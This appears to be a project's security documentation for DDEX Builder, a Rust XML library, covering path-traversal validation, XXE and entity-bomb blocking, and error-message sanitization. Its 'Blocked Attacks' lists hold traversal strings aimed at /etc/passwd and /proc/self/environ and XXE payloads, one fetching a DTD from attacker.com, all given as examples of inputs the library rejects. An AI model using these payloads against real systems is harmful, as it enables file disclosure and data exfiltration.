# Security Improvements

This document outlines the comprehensive security improvements implemented in DDEX Builder to protect against XML attacks, path traversal, and information disclosure vulnerabilities.

## Overview

The security improvements consist of three integrated layers of protection:

1. **Path Validation System** - Prevents directory traversal and file system attacks
2. **Entity Classification System** - Blocks XXE attacks and entity expansion bombs
3. **Error Sanitization System** - Prevents information disclosure through error messages

## Security Improvements Summary

### ✅ Path Traversal Protection

**Problem**: Directory traversal attacks could access sensitive files outside intended directories.

**Solution**: Comprehensive path validation with multiple protection layers:

- **Normalized Path Validation**: Resolves `..` and `.` components to detect traversal attempts
- **Restricted Directories**: Blocks access to system directories (`/etc`, `/proc`, `/dev`, Windows system paths)
- **Character Filtering**: Prevents null bytes, control characters, and malicious Unicode
- **Cross-Platform Support**: Handles Windows (`\`, UNC paths) and Unix (`/`) path separators
- **Encoding Attack Prevention**: Detects URL-encoded and Unicode normalization attacks

**Blocked Attacks**:
```
../../../etc/passwd                    ❌ Blocked
%2e%2e%2fetc%2fpasswd                 ❌ Blocked
..\\..\\Windows\\System32\\config     ❌ Blocked
\\\\?\\C:\\Windows\\System32          ❌ Blocked
/proc/self/environ                    ❌ Blocked
.env                                  ❌ Blocked
```

**Allowed Paths**:
```
valid/file.xml                        ✅ Allowed
data/music/track.mp3                  ✅ Allowed
output/generated.xml                  ✅ Allowed
```

### ✅ XXE Attack Prevention

**Problem**: XML External Entity (XXE) attacks could access files, make network requests, or cause denial of service.

**Solution**: Multi-layer entity classification system:

- **Entity Classification**: Categorizes entities as Safe, Suspicious, or Malicious
- **External Entity Blocking**: Prevents `SYSTEM` and `PUBLIC` entity references
- **Parameter Entity Blocking**: Stops parameter entity (`%entity;`) attacks
- **Expansion Limits**: Prevents billion laughs and quadratic blowup attacks
- **Depth Tracking**: Limits recursive entity expansion depth
- **DDEX Whitelist**: Allows legitimate DDEX entities while blocking attacks

**Blocked Attacks**:
```xml
<!ENTITY xxe SYSTEM "file:///etc/passwd">                    ❌ Blocked
<!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd">          ❌ Blocked
<!ENTITY lol "&lol2;&lol2;&lol2;&lol2;&lol2;">                ❌ Blocked
<!ENTITY % file SYSTEM "file:///etc/passwd">                 ❌ Blocked
<!ENTITY bomb "A very long string repeated many times...">   ❌ Blocked
```

**Allowed Entities**:
```xml
<!ENTITY title "Song Title">                                 ✅ Allowed
<!ENTITY isrc "USRC17607839">                                ✅ Allowed
<!ENTITY duration "PT3M45S">                                 ✅ Allowed
```

### ✅ Information Disclosure Prevention

**Problem**: Error messages could leak sensitive file paths, IP addresses, system information.

**Solution**: Context-aware error message sanitization:

- **Production Mode**: Minimal information disclosure, generic error messages
- **Development Mode**: Helpful debugging info with sensitive data redacted
- **Correlation IDs**: Link public errors to detailed internal logs
- **Pattern Redaction**: Removes file paths, IPs, memory addresses, API keys
- **Context-Aware**: Different sanitization based on error context
- **Configurable**: Adjustable verbosity based on environment

**Information Redacted**:
```
File paths:     /home/user/secrets.txt → <file path>
IP addresses:   192.168.1.100 → <ip address>
Memory addrs:   0x7fff5fbff000 → <memory address>
API keys:       sk_live_123...abc → sk_<redacted>
Stack traces:   at function:42 → <stack trace>
```

**Safe Error Messages**:
```
Production:  "File operation failed [E1002] [ID: a1b2c3d4]"
Development: "Failed to read file [E1002] [ID: a1b2c3d4]"
Internal Log: "Failed to read /home/user/secrets.txt: Permission denied [ID: a1b2c3d4]"
```

### Configuration Management

Each security component supports environment-based configuration:

**Production Configuration**:
```rust
// Maximum security, minimal disclosure
PathValidationConfig {
    allow_parent_traversal: false,
    allow_absolute_paths: false,
    blocked_patterns: COMPREHENSIVE_BLOCKLIST,
    max_path_length: 255,
}
ClassifierConfig {
    allow_external_entities: false,
    allow_parameter_entities: false,
    max_expansion_ratio: 10.0,
    max_depth: 3,
}
SanitizerConfig {
    mode: ErrorMode::Production,
    max_message_length: 150,
    include_error_codes: true,
    log_internal_details: true,
}
```

**Development Configuration**:
```rust
// Balanced security with helpful debugging
PathValidationConfig {
    allow_parent_traversal: false, // Still secure
    allow_absolute_paths: true,    // More permissive for dev
    max_path_length: 1000,
}
ClassifierConfig {
    allow_external_entities: false, // Still secure
    max_expansion_ratio: 50.0,      // More permissive for testing
    max_depth: 5,
}
SanitizerConfig {
    mode: ErrorMode::Development,
    max_message_length: 300,       // Longer messages
    include_error_codes: true,
    log_internal_details: false,   // Reduce log noise
}
```

## Usage Examples

### Basic Security Integration

```rust
use ddex_builder::security::{
    PathValidator, EntityClassifier, ErrorSanitizer,
    sanitize_io_error, sanitize_security_error, ErrorContext
};
// Validate file paths before processing
let mut validator = PathValidator::new();
let path_result = validator.validate_path(&user_provided_path);
if !path_result.is_safe {
    let error = std::io::Error::new(std::io::ErrorKind::PermissionDenied, "Invalid path");
    return Err(sanitize_security_error(error));
}
// Validate XML entities before parsing
let mut classifier = EntityClassifier::new();
let entity_result = classifier.validate_entity_chain(&extracted_entities);
if !entity_result.is_safe {
    let error = std::io::Error::new(std::io::ErrorKind::InvalidData, "Malicious entities detected");
    return Err(sanitize_security_error(error));
}
// Always sanitize error messages in responses
.map_err(|e| sanitize_io_error(e, ErrorContext::FileRead))
```

### Production Deployment

```rust
// Initialize security components at startup
let security_config = if cfg!(debug_assertions) {
    SecurityConfig::development()
} else {
    SecurityConfig::production()
};
ddex_builder::security::init_global_sanitizer(security_config.sanitizer);
// Use throughout application
match risky_operation() {
    Err(e) => {
        let sanitized = sanitize_io_error(e, ErrorContext::FileRead);
        // Safe to return to user
        Err(sanitized)
    }
    Ok(result) => Ok(result),
}
```
